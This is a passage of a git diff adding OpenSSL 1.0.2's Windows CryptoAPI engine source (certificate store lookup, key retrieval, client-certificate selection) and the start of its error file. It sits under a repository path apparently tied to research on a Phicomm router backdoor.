+static void capi_vtrace(CAPI_CTX * ctx, int level, char *format,
+                        va_list argptr)
+{
+    BIO *out;
+
+    if (!ctx || (ctx->debug_level < level) || (!ctx->debug_file))
+        return;
+    out = BIO_new_file(ctx->debug_file, "a+");
+    BIO_vprintf(out, format, argptr);
+    BIO_free(out);
+}
+
+static void CAPI_trace(CAPI_CTX * ctx, char *format, ...)
+{
+    va_list args;
+    va_start(args, format);
+    capi_vtrace(ctx, CAPI_DBG_TRACE, format, args);
+    va_end(args);
+}
+
+static void capi_addlasterror(void)
+{
+    capi_adderror(GetLastError());
+}
+
+static void capi_adderror(DWORD err)
+{
+    char errstr[10];
+    BIO_snprintf(errstr, 10, "%lX", err);
+    ERR_add_error_data(2, "Error code= 0x", errstr);
+}
+
+static char *wide_to_asc(LPCWSTR wstr)
+{
+    char *str;
+    int len_0, sz;
+
+    if (!wstr)
+        return NULL;
+    len_0 = (int)wcslen(wstr) + 1; /* WideCharToMultiByte expects int */
+    sz = WideCharToMultiByte(CP_ACP, 0, wstr, len_0, NULL, 0, NULL, NULL);
+    if (!sz) {
+        CAPIerr(CAPI_F_WIDE_TO_ASC, CAPI_R_WIN32_ERROR);
+        return NULL;
+    }
+    str = OPENSSL_malloc(sz);
+    if (!str) {
+        CAPIerr(CAPI_F_WIDE_TO_ASC, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    if (!WideCharToMultiByte(CP_ACP, 0, wstr, len_0, str, sz, NULL, NULL)) {
+        OPENSSL_free(str);
+        CAPIerr(CAPI_F_WIDE_TO_ASC, CAPI_R_WIN32_ERROR);
+        return NULL;
+    }
+    return str;
+}
+
+static int capi_get_provname(CAPI_CTX * ctx, LPSTR * pname, DWORD * ptype,
+                             DWORD idx)
+{
+    DWORD len, err;
+    LPTSTR name;
+    CAPI_trace(ctx, "capi_get_provname, index=%d\n", idx);
+    if (!CryptEnumProviders(idx, NULL, 0, ptype, NULL, &len)) {
+        err = GetLastError();
+        if (err == ERROR_NO_MORE_ITEMS)
+            return 2;
+        CAPIerr(CAPI_F_CAPI_GET_PROVNAME, CAPI_R_CRYPTENUMPROVIDERS_ERROR);
+        capi_adderror(err);
+        return 0;
+    }
+    if (sizeof(TCHAR) != sizeof(char))
+        name = alloca(len);
+    else
+        name = OPENSSL_malloc(len);
+    if (!CryptEnumProviders(idx, NULL, 0, ptype, name, &len)) {
+        err = GetLastError();
+        if (err == ERROR_NO_MORE_ITEMS)
+            return 2;
+        CAPIerr(CAPI_F_CAPI_GET_PROVNAME, CAPI_R_CRYPTENUMPROVIDERS_ERROR);
+        capi_adderror(err);
+        return 0;
+    }
+    if (sizeof(TCHAR) != sizeof(char))
+        *pname = wide_to_asc((WCHAR *)name);
+    else
+        *pname = (char *)name;
+    CAPI_trace(ctx, "capi_get_provname, returned name=%s, type=%d\n", *pname,
+               *ptype);
+
+    return 1;
+}
+
+static int capi_list_providers(CAPI_CTX * ctx, BIO *out)
+{
+    DWORD idx, ptype;
+    int ret;
+    LPSTR provname = NULL;
+    CAPI_trace(ctx, "capi_list_providers\n");
+    BIO_printf(out, "Available CSPs:\n");
+    for (idx = 0;; idx++) {
+        ret = capi_get_provname(ctx, &provname, &ptype, idx);
+        if (ret == 2)
+            break;
+        if (ret == 0)
+            break;
+        BIO_printf(out, "%d. %s, type %d\n", idx, provname, ptype);
+        OPENSSL_free(provname);
+    }
+    return 1;
+}
+
+static int capi_list_containers(CAPI_CTX * ctx, BIO *out)
+{
+    int ret = 1;
+    HCRYPTPROV hprov;
+    DWORD err, idx, flags, buflen = 0, clen;
+    LPSTR cname;
+    LPTSTR cspname = NULL;
+
+    CAPI_trace(ctx, "Listing containers CSP=%s, type = %d\n", ctx->cspname,
+               ctx->csptype);
+    if (ctx->cspname && sizeof(TCHAR) != sizeof(char)) {
+        if ((clen =
+             MultiByteToWideChar(CP_ACP, 0, ctx->cspname, -1, NULL, 0))) {
+            cspname = alloca(clen * sizeof(WCHAR));
+            MultiByteToWideChar(CP_ACP, 0, ctx->cspname, -1, (WCHAR *)cspname,
+                                clen);
+        }
+        if (!cspname) {
+            CAPIerr(CAPI_F_CAPI_LIST_CONTAINERS, ERR_R_MALLOC_FAILURE);
+            capi_addlasterror();
+            return 0;
+        }
+    } else
+        cspname = (TCHAR *)ctx->cspname;
+    if (!CryptAcquireContext
+        (&hprov, NULL, cspname, ctx->csptype, CRYPT_VERIFYCONTEXT)) {
+        CAPIerr(CAPI_F_CAPI_LIST_CONTAINERS,
+                CAPI_R_CRYPTACQUIRECONTEXT_ERROR);
+        capi_addlasterror();
+        return 0;
+    }
+    if (!CryptGetProvParam
+        (hprov, PP_ENUMCONTAINERS, NULL, &buflen, CRYPT_FIRST)) {
+        CAPIerr(CAPI_F_CAPI_LIST_CONTAINERS, CAPI_R_ENUMCONTAINERS_ERROR);
+        capi_addlasterror();
+        CryptReleaseContext(hprov, 0);
+        return 0;
+    }
+    CAPI_trace(ctx, "Got max container len %d\n", buflen);
+    if (buflen == 0)
+        buflen = 1024;
+    cname = OPENSSL_malloc(buflen);
+    if (!cname) {
+        CAPIerr(CAPI_F_CAPI_LIST_CONTAINERS, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    for (idx = 0;; idx++) {
+        clen = buflen;
+        cname[0] = 0;
+
+        if (idx == 0)
+            flags = CRYPT_FIRST;
+        else
+            flags = 0;
+        if (!CryptGetProvParam
+            (hprov, PP_ENUMCONTAINERS, (BYTE *) cname, &clen, flags)) {
+            err = GetLastError();
+            if (err == ERROR_NO_MORE_ITEMS)
+                goto done;
+            CAPIerr(CAPI_F_CAPI_LIST_CONTAINERS, CAPI_R_ENUMCONTAINERS_ERROR);
+            capi_adderror(err);
+            goto err;
+        }
+        CAPI_trace(ctx, "Container name %s, len=%d, index=%d, flags=%d\n",
+                   cname, clen, idx, flags);
+        if (!cname[0] && (clen == buflen)) {
+            CAPI_trace(ctx, "Enumerate bug: using workaround\n");
+            goto done;
+        }
+        BIO_printf(out, "%d. %s\n", idx, cname);
+    }
+ err:
+
+    ret = 0;
+
+ done:
+    if (cname)
+        OPENSSL_free(cname);
+    CryptReleaseContext(hprov, 0);
+
+    return ret;
+}
+
+CRYPT_KEY_PROV_INFO *capi_get_prov_info(CAPI_CTX * ctx, PCCERT_CONTEXT cert)
+{
+    DWORD len;
+    CRYPT_KEY_PROV_INFO *pinfo;
+
+    if (!CertGetCertificateContextProperty
+        (cert, CERT_KEY_PROV_INFO_PROP_ID, NULL, &len))
+        return NULL;
+    pinfo = OPENSSL_malloc(len);
+    if (!pinfo) {
+        CAPIerr(CAPI_F_CAPI_GET_PROV_INFO, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    if (!CertGetCertificateContextProperty
+        (cert, CERT_KEY_PROV_INFO_PROP_ID, pinfo, &len)) {
+        CAPIerr(CAPI_F_CAPI_GET_PROV_INFO,
+                CAPI_R_ERROR_GETTING_KEY_PROVIDER_INFO);
+        capi_addlasterror();
+        OPENSSL_free(pinfo);
+        return NULL;
+    }
+    return pinfo;
+}
+
+static void capi_dump_prov_info(CAPI_CTX * ctx, BIO *out,
+                                CRYPT_KEY_PROV_INFO * pinfo)
+{
+    char *provname = NULL, *contname = NULL;
+    if (!pinfo) {
+        BIO_printf(out, "  No Private Key\n");
+        return;
+    }
+    provname = wide_to_asc(pinfo->pwszProvName);
+    contname = wide_to_asc(pinfo->pwszContainerName);
+    if (!provname || !contname)
+        goto err;
+
+    BIO_printf(out, "  Private Key Info:\n");
+    BIO_printf(out, "    Provider Name:  %s, Provider Type %d\n", provname,
+               pinfo->dwProvType);
+    BIO_printf(out, "    Container Name: %s, Key Type %d\n", contname,
+               pinfo->dwKeySpec);
+ err:
+    if (provname)
+        OPENSSL_free(provname);
+    if (contname)
+        OPENSSL_free(contname);
+}
+
+char *capi_cert_get_fname(CAPI_CTX * ctx, PCCERT_CONTEXT cert)
+{
+    LPWSTR wfname;
+    DWORD dlen;
+
+    CAPI_trace(ctx, "capi_cert_get_fname\n");
+    if (!CertGetCertificateContextProperty
+        (cert, CERT_FRIENDLY_NAME_PROP_ID, NULL, &dlen))
+        return NULL;
+    wfname = OPENSSL_malloc(dlen);
+    if (CertGetCertificateContextProperty
+        (cert, CERT_FRIENDLY_NAME_PROP_ID, wfname, &dlen)) {
+        char *fname = wide_to_asc(wfname);
+        OPENSSL_free(wfname);
+        return fname;
+    }
+    CAPIerr(CAPI_F_CAPI_CERT_GET_FNAME, CAPI_R_ERROR_GETTING_FRIENDLY_NAME);
+    capi_addlasterror();
+
+    OPENSSL_free(wfname);
+    return NULL;
+}
+
+void capi_dump_cert(CAPI_CTX * ctx, BIO *out, PCCERT_CONTEXT cert)
+{
+    X509 *x;
+    unsigned char *p;
+    unsigned long flags = ctx->dump_flags;
+    if (flags & CAPI_DMP_FNAME) {
+        char *fname;
+        fname = capi_cert_get_fname(ctx, cert);
+        if (fname) {
+            BIO_printf(out, "  Friendly Name \"%s\"\n", fname);
+            OPENSSL_free(fname);
+        } else
+            BIO_printf(out, "  <No Friendly Name>\n");
+    }
+
+    p = cert->pbCertEncoded;
+    x = d2i_X509(NULL, &p, cert->cbCertEncoded);
+    if (!x)
+        BIO_printf(out, "  <Can't parse certificate>\n");
+    if (flags & CAPI_DMP_SUMMARY) {
+        BIO_printf(out, "  Subject: ");
+        X509_NAME_print_ex(out, X509_get_subject_name(x), 0, XN_FLAG_ONELINE);
+        BIO_printf(out, "\n  Issuer: ");
+        X509_NAME_print_ex(out, X509_get_issuer_name(x), 0, XN_FLAG_ONELINE);
+        BIO_printf(out, "\n");
+    }
+    if (flags & CAPI_DMP_FULL)
+        X509_print_ex(out, x, XN_FLAG_ONELINE, 0);
+
+    if (flags & CAPI_DMP_PKEYINFO) {
+        CRYPT_KEY_PROV_INFO *pinfo;
+        pinfo = capi_get_prov_info(ctx, cert);
+        capi_dump_prov_info(ctx, out, pinfo);
+        if (pinfo)
+            OPENSSL_free(pinfo);
+    }
+
+    if (flags & CAPI_DMP_PEM)
+        PEM_write_bio_X509(out, x);
+    X509_free(x);
+}
+
+HCERTSTORE capi_open_store(CAPI_CTX * ctx, char *storename)
+{
+    HCERTSTORE hstore;
+
+    if (!storename)
+        storename = ctx->storename;
+    if (!storename)
+        storename = "MY";
+    CAPI_trace(ctx, "Opening certificate store %s\n", storename);
+
+    hstore = CertOpenStore(CERT_STORE_PROV_SYSTEM_A, 0, 0,
+                           ctx->store_flags, storename);
+    if (!hstore) {
+        CAPIerr(CAPI_F_CAPI_OPEN_STORE, CAPI_R_ERROR_OPENING_STORE);
+        capi_addlasterror();
+    }
+    return hstore;
+}
+
+int capi_list_certs(CAPI_CTX * ctx, BIO *out, char *id)
+{
+    char *storename;
+    int idx;
+    int ret = 1;
+    HCERTSTORE hstore;
+    PCCERT_CONTEXT cert = NULL;
+
+    storename = ctx->storename;
+    if (!storename)
+        storename = "MY";
+    CAPI_trace(ctx, "Listing certs for store %s\n", storename);
+
+    hstore = capi_open_store(ctx, storename);
+    if (!hstore)
+        return 0;
+    if (id) {
+        cert = capi_find_cert(ctx, id, hstore);
+        if (!cert) {
+            ret = 0;
+            goto err;
+        }
+        capi_dump_cert(ctx, out, cert);
+        CertFreeCertificateContext(cert);
+    } else {
+        for (idx = 0;; idx++) {
+            cert = CertEnumCertificatesInStore(hstore, cert);
+            if (!cert)
+                break;
+            BIO_printf(out, "Certificate %d\n", idx);
+            capi_dump_cert(ctx, out, cert);
+        }
+    }
+ err:
+    CertCloseStore(hstore, 0);
+    return ret;
+}
+
+static PCCERT_CONTEXT capi_find_cert(CAPI_CTX * ctx, const char *id,
+                                     HCERTSTORE hstore)
+{
+    PCCERT_CONTEXT cert = NULL;
+    char *fname = NULL;
+    int match;
+    switch (ctx->lookup_method) {
+    case CAPI_LU_SUBSTR:
+        return CertFindCertificateInStore(hstore,
+                                          X509_ASN_ENCODING, 0,
+                                          CERT_FIND_SUBJECT_STR_A, id, NULL);
+    case CAPI_LU_FNAME:
+        for (;;) {
+            cert = CertEnumCertificatesInStore(hstore, cert);
+            if (!cert)
+                return NULL;
+            fname = capi_cert_get_fname(ctx, cert);
+            if (fname) {
+                if (strcmp(fname, id))
+                    match = 0;
+                else
+                    match = 1;
+                OPENSSL_free(fname);
+                if (match)
+                    return cert;
+            }
+        }
+    default:
+        return NULL;
+    }
+}
+
+static CAPI_KEY *capi_get_key(CAPI_CTX * ctx, const TCHAR *contname,
+                              TCHAR *provname, DWORD ptype, DWORD keyspec)
+{
+    CAPI_KEY *key;
+    DWORD dwFlags = 0;
+    key = OPENSSL_malloc(sizeof(CAPI_KEY));
+    if (sizeof(TCHAR) == sizeof(char))
+        CAPI_trace(ctx, "capi_get_key, contname=%s, provname=%s, type=%d\n",
+                   contname, provname, ptype);
+    else if (ctx && ctx->debug_level >= CAPI_DBG_TRACE && ctx->debug_file) {
+        /* above 'if' is optimization to minimize malloc-ations */
+        char *_contname = wide_to_asc((WCHAR *)contname);
+        char *_provname = wide_to_asc((WCHAR *)provname);
+
+        CAPI_trace(ctx, "capi_get_key, contname=%s, provname=%s, type=%d\n",
+                   _contname, _provname, ptype);
+        if (_provname)
+            OPENSSL_free(_provname);
+        if (_contname)
+            OPENSSL_free(_contname);
+    }
+    if (ctx->store_flags & CERT_SYSTEM_STORE_LOCAL_MACHINE)
+        dwFlags = CRYPT_MACHINE_KEYSET;
+    if (!CryptAcquireContext(&key->hprov, contname, provname, ptype, dwFlags)) {
+        CAPIerr(CAPI_F_CAPI_GET_KEY, CAPI_R_CRYPTACQUIRECONTEXT_ERROR);
+        capi_addlasterror();
+        goto err;
+    }
+    if (!CryptGetUserKey(key->hprov, keyspec, &key->key)) {
+        CAPIerr(CAPI_F_CAPI_GET_KEY, CAPI_R_GETUSERKEY_ERROR);
+        capi_addlasterror();
+        CryptReleaseContext(key->hprov, 0);
+        goto err;
+    }
+    key->keyspec = keyspec;
+    key->pcert = NULL;
+    return key;
+
+ err:
+    OPENSSL_free(key);
+    return NULL;
+}
+
+static CAPI_KEY *capi_get_cert_key(CAPI_CTX * ctx, PCCERT_CONTEXT cert)
+{
+    CAPI_KEY *key = NULL;
+    CRYPT_KEY_PROV_INFO *pinfo = NULL;
+    char *provname = NULL, *contname = NULL;
+    pinfo = capi_get_prov_info(ctx, cert);
+    if (!pinfo)
+        goto err;
+    if (sizeof(TCHAR) != sizeof(char))
+        key = capi_get_key(ctx, (TCHAR *)pinfo->pwszContainerName,
+                           (TCHAR *)pinfo->pwszProvName,
+                           pinfo->dwProvType, pinfo->dwKeySpec);
+    else {
+        provname = wide_to_asc(pinfo->pwszProvName);
+        contname = wide_to_asc(pinfo->pwszContainerName);
+        if (!provname || !contname)
+            goto err;
+        key = capi_get_key(ctx, (TCHAR *)contname, (TCHAR *)provname,
+                           pinfo->dwProvType, pinfo->dwKeySpec);
+    }
+
+ err:
+    if (pinfo)
+        OPENSSL_free(pinfo);
+    if (provname)
+        OPENSSL_free(provname);
+    if (contname)
+        OPENSSL_free(contname);
+    return key;
+}
+
+CAPI_KEY *capi_find_key(CAPI_CTX * ctx, const char *id)
+{
+    PCCERT_CONTEXT cert;
+    HCERTSTORE hstore;
+    CAPI_KEY *key = NULL;
+    switch (ctx->lookup_method) {
+    case CAPI_LU_SUBSTR:
+    case CAPI_LU_FNAME:
+        hstore = capi_open_store(ctx, NULL);
+        if (!hstore)
+            return NULL;
+        cert = capi_find_cert(ctx, id, hstore);
+        if (cert) {
+            key = capi_get_cert_key(ctx, cert);
+            CertFreeCertificateContext(cert);
+        }
+        CertCloseStore(hstore, 0);
+        break;
+
+    case CAPI_LU_CONTNAME:
+        if (sizeof(TCHAR) != sizeof(char)) {
+            WCHAR *contname, *provname;
+            DWORD len;
+
+            if ((len = MultiByteToWideChar(CP_ACP, 0, id, -1, NULL, 0)) &&
+                (contname = alloca(len * sizeof(WCHAR)),
+                 MultiByteToWideChar(CP_ACP, 0, id, -1, contname, len)) &&
+                (len =
+                 MultiByteToWideChar(CP_ACP, 0, ctx->cspname, -1, NULL, 0))
+                && (provname =
+                    alloca(len * sizeof(WCHAR)), MultiByteToWideChar(CP_ACP,
+                                                                     0,
+                                                                     ctx->cspname,
+                                                                     -1,
+                                                                     provname,
+                                                                     len)))
+                key =
+                    capi_get_key(ctx, (TCHAR *)contname, (TCHAR *)provname,
+                                 ctx->csptype, ctx->keytype);
+        } else
+            key = capi_get_key(ctx, (TCHAR *)id,
+                               (TCHAR *)ctx->cspname,
+                               ctx->csptype, ctx->keytype);
+        break;
+    }
+
+    return key;
+}
+
+void capi_free_key(CAPI_KEY * key)
+{
+    if (!key)
+        return;
+    CryptDestroyKey(key->key);
+    CryptReleaseContext(key->hprov, 0);
+    if (key->pcert)
+        CertFreeCertificateContext(key->pcert);
+    OPENSSL_free(key);
+}
+
+/* Initialize a CAPI_CTX structure */
+
+static CAPI_CTX *capi_ctx_new()
+{
+    CAPI_CTX *ctx;
+    ctx = OPENSSL_malloc(sizeof(CAPI_CTX));
+    if (!ctx) {
+        CAPIerr(CAPI_F_CAPI_CTX_NEW, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    ctx->cspname = NULL;
+    ctx->csptype = PROV_RSA_FULL;
+    ctx->dump_flags = CAPI_DMP_SUMMARY | CAPI_DMP_FNAME;
+    ctx->keytype = AT_KEYEXCHANGE;
+    ctx->storename = NULL;
+    ctx->ssl_client_store = NULL;
+    ctx->store_flags = CERT_STORE_OPEN_EXISTING_FLAG |
+        CERT_STORE_READONLY_FLAG | CERT_SYSTEM_STORE_CURRENT_USER;
+    ctx->lookup_method = CAPI_LU_SUBSTR;
+    ctx->debug_level = 0;
+    ctx->debug_file = NULL;
+    ctx->client_cert_select = cert_select_simple;
+    return ctx;
+}
+
+static void capi_ctx_free(CAPI_CTX * ctx)
+{
+    CAPI_trace(ctx, "Calling capi_ctx_free with %lx\n", ctx);
+    if (!ctx)
+        return;
+    if (ctx->cspname)
+        OPENSSL_free(ctx->cspname);
+    if (ctx->debug_file)
+        OPENSSL_free(ctx->debug_file);
+    if (ctx->storename)
+        OPENSSL_free(ctx->storename);
+    if (ctx->ssl_client_store)
+        OPENSSL_free(ctx->ssl_client_store);
+    OPENSSL_free(ctx);
+}
+
+static int capi_ctx_set_provname(CAPI_CTX * ctx, LPSTR pname, DWORD type,
+                                 int check)
+{
+    CAPI_trace(ctx, "capi_ctx_set_provname, name=%s, type=%d\n", pname, type);
+    if (check) {
+        HCRYPTPROV hprov;
+        LPTSTR name = NULL;
+
+        if (sizeof(TCHAR) != sizeof(char)) {
+            DWORD len;
+            if ((len = MultiByteToWideChar(CP_ACP, 0, pname, -1, NULL, 0))) {
+                name = alloca(len * sizeof(WCHAR));
+                MultiByteToWideChar(CP_ACP, 0, pname, -1, (WCHAR *)name, len);
+            }
+        } else
+            name = (TCHAR *)pname;
+
+        if (!name || !CryptAcquireContext(&hprov, NULL, name, type,
+                                          CRYPT_VERIFYCONTEXT)) {
+            CAPIerr(CAPI_F_CAPI_CTX_SET_PROVNAME,
+                    CAPI_R_CRYPTACQUIRECONTEXT_ERROR);
+            capi_addlasterror();
+            return 0;
+        }
+        CryptReleaseContext(hprov, 0);
+    }
+    if (ctx->cspname)
+        OPENSSL_free(ctx->cspname);
+    ctx->cspname = BUF_strdup(pname);
+    ctx->csptype = type;
+    return 1;
+}
+
+static int capi_ctx_set_provname_idx(CAPI_CTX * ctx, int idx)
+{
+    LPSTR pname;
+    DWORD type;
+    int res;
+    if (capi_get_provname(ctx, &pname, &type, idx) != 1)
+        return 0;
+    res = capi_ctx_set_provname(ctx, pname, type, 0);
+    OPENSSL_free(pname);
+    return res;
+}
+
+static int cert_issuer_match(STACK_OF(X509_NAME) *ca_dn, X509 *x)
+{
+    int i;
+    X509_NAME *nm;
+    /* Special case: empty list: match anything */
+    if (sk_X509_NAME_num(ca_dn) <= 0)
+        return 1;
+    for (i = 0; i < sk_X509_NAME_num(ca_dn); i++) {
+        nm = sk_X509_NAME_value(ca_dn, i);
+        if (!X509_NAME_cmp(nm, X509_get_issuer_name(x)))
+            return 1;
+    }
+    return 0;
+}
+
+static int capi_load_ssl_client_cert(ENGINE *e, SSL *ssl,
+                                     STACK_OF(X509_NAME) *ca_dn, X509 **pcert,
+                                     EVP_PKEY **pkey, STACK_OF(X509) **pother,
+                                     UI_METHOD *ui_method,
+                                     void *callback_data)
+{
+    STACK_OF(X509) *certs = NULL;
+    X509 *x;
+    char *storename;
+    const char *p;
+    int i, client_cert_idx;
+    HCERTSTORE hstore;
+    PCCERT_CONTEXT cert = NULL, excert = NULL;
+    CAPI_CTX *ctx;
+    CAPI_KEY *key;
+    ctx = ENGINE_get_ex_data(e, capi_idx);
+
+    *pcert = NULL;
+    *pkey = NULL;
+
+    storename = ctx->ssl_client_store;
+    if (!storename)
+        storename = "MY";
+
+    hstore = capi_open_store(ctx, storename);
+    if (!hstore)
+        return 0;
+    /* Enumerate all certificates collect any matches */
+    for (i = 0;; i++) {
+        cert = CertEnumCertificatesInStore(hstore, cert);
+        if (!cert)
+            break;
+        p = cert->pbCertEncoded;
+        x = d2i_X509(NULL, &p, cert->cbCertEncoded);
+        if (!x) {
+            CAPI_trace(ctx, "Can't Parse Certificate %d\n", i);
+            continue;
+        }
+        if (cert_issuer_match(ca_dn, x)
+            && X509_check_purpose(x, X509_PURPOSE_SSL_CLIENT, 0)) {
+            key = capi_get_cert_key(ctx, cert);
+            if (!key) {
+                X509_free(x);
+                continue;
+            }
+            /*
+             * Match found: attach extra data to it so we can retrieve the
+             * key later.
+             */
+            excert = CertDuplicateCertificateContext(cert);
+            key->pcert = excert;
+            X509_set_ex_data(x, cert_capi_idx, key);
+
+            if (!certs)
+                certs = sk_X509_new_null();
+
+            sk_X509_push(certs, x);
+        } else
+            X509_free(x);
+
+    }
+
+    if (cert)
+        CertFreeCertificateContext(cert);
+    if (hstore)
+        CertCloseStore(hstore, 0);
+
+    if (!certs)
+        return 0;
+
+    /* Select the appropriate certificate */
+
+    client_cert_idx = ctx->client_cert_select(e, ssl, certs);
+
+    /* Set the selected certificate and free the rest */
+
+    for (i = 0; i < sk_X509_num(certs); i++) {
+        x = sk_X509_value(certs, i);
+        if (i == client_cert_idx)
+            *pcert = x;
+        else {
+            key = X509_get_ex_data(x, cert_capi_idx);
+            capi_free_key(key);
+            X509_free(x);
+        }
+    }
+
+    sk_X509_free(certs);
+
+    if (!*pcert)
+        return 0;
+
+    /* Setup key for selected certificate */
+
+    key = X509_get_ex_data(*pcert, cert_capi_idx);
+    *pkey = capi_get_pkey(e, key);
+    X509_set_ex_data(*pcert, cert_capi_idx, NULL);
+
+    return 1;
+
+}
+
+/* Simple client cert selection function: always select first */
+
+static int cert_select_simple(ENGINE *e, SSL *ssl, STACK_OF(X509) *certs)
+{
+    return 0;
+}
+
+# ifdef OPENSSL_CAPIENG_DIALOG
+
+/*
+ * More complex cert selection function, using standard function
+ * CryptUIDlgSelectCertificateFromStore() to produce a dialog box.
+ */
+
+/*
+ * Definitions which are in cryptuiapi.h but this is not present in older
+ * versions of headers.
+ */
+
+#  ifndef CRYPTUI_SELECT_LOCATION_COLUMN
+#   define CRYPTUI_SELECT_LOCATION_COLUMN                   0x000000010
+#   define CRYPTUI_SELECT_INTENDEDUSE_COLUMN                0x000000004
+#  endif
+
+#  define dlg_title L"OpenSSL Application SSL Client Certificate Selection"
+#  define dlg_prompt L"Select a certificate to use for authentication"
+#  define dlg_columns      CRYPTUI_SELECT_LOCATION_COLUMN \
+                        |CRYPTUI_SELECT_INTENDEDUSE_COLUMN
+
+static int cert_select_dialog(ENGINE *e, SSL *ssl, STACK_OF(X509) *certs)
+{
+    X509 *x;
+    HCERTSTORE dstore;
+    PCCERT_CONTEXT cert;
+    CAPI_CTX *ctx;
+    CAPI_KEY *key;
+    HWND hwnd;
+    int i, idx = -1;
+    if (sk_X509_num(certs) == 1)
+        return 0;
+    ctx = ENGINE_get_ex_data(e, capi_idx);
+    /* Create an in memory store of certificates */
+    dstore = CertOpenStore(CERT_STORE_PROV_MEMORY, 0, 0,
+                           CERT_STORE_CREATE_NEW_FLAG, NULL);
+    if (!dstore) {
+        CAPIerr(CAPI_F_CERT_SELECT_DIALOG, CAPI_R_ERROR_CREATING_STORE);
+        capi_addlasterror();
+        goto err;
+    }
+    /* Add all certificates to store */
+    for (i = 0; i < sk_X509_num(certs); i++) {
+        x = sk_X509_value(certs, i);
+        key = X509_get_ex_data(x, cert_capi_idx);
+
+        if (!CertAddCertificateContextToStore(dstore, key->pcert,
+                                              CERT_STORE_ADD_NEW, NULL)) {
+            CAPIerr(CAPI_F_CERT_SELECT_DIALOG, CAPI_R_ERROR_ADDING_CERT);
+            capi_addlasterror();
+            goto err;
+        }
+
+    }
+    hwnd = GetForegroundWindow();
+    if (!hwnd)
+        hwnd = GetActiveWindow();
+    if (!hwnd && ctx->getconswindow)
+        hwnd = ctx->getconswindow();
+    /* Call dialog to select one */
+    cert = ctx->certselectdlg(dstore, hwnd, dlg_title, dlg_prompt,
+                              dlg_columns, 0, NULL);
+
+    /* Find matching cert from list */
+    if (cert) {
+        for (i = 0; i < sk_X509_num(certs); i++) {
+            x = sk_X509_value(certs, i);
+            key = X509_get_ex_data(x, cert_capi_idx);
+            if (CertCompareCertificate
+                (X509_ASN_ENCODING | PKCS_7_ASN_ENCODING, cert->pCertInfo,
+                 key->pcert->pCertInfo)) {
+                idx = i;
+                break;
+            }
+        }
+    }
+
+ err:
+    if (dstore)
+        CertCloseStore(dstore, 0);
+    return idx;
+
+}
+# endif
+
+#else                           /* !__COMPILE_CAPIENG */
+# include <openssl/engine.h>
+# ifndef OPENSSL_NO_DYNAMIC_ENGINE
+OPENSSL_EXPORT
+    int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns);
+OPENSSL_EXPORT
+    int bind_engine(ENGINE *e, const char *id, const dynamic_fns *fns)
+{
+    return 0;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+# else
+void ENGINE_load_capi(void)
+{
+}
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi.ec
new file mode 100644
index 0000000..d2ad668
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi.ec
@@ -0,0 +1 @@
+L       CAPI    e_capi_err.h e_capi_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi_err.c
new file mode 100644
index 0000000..a266138
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_capi_err.c
@@ -0,0 +1,187 @@
+/* e_capi_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2009 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_capi_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
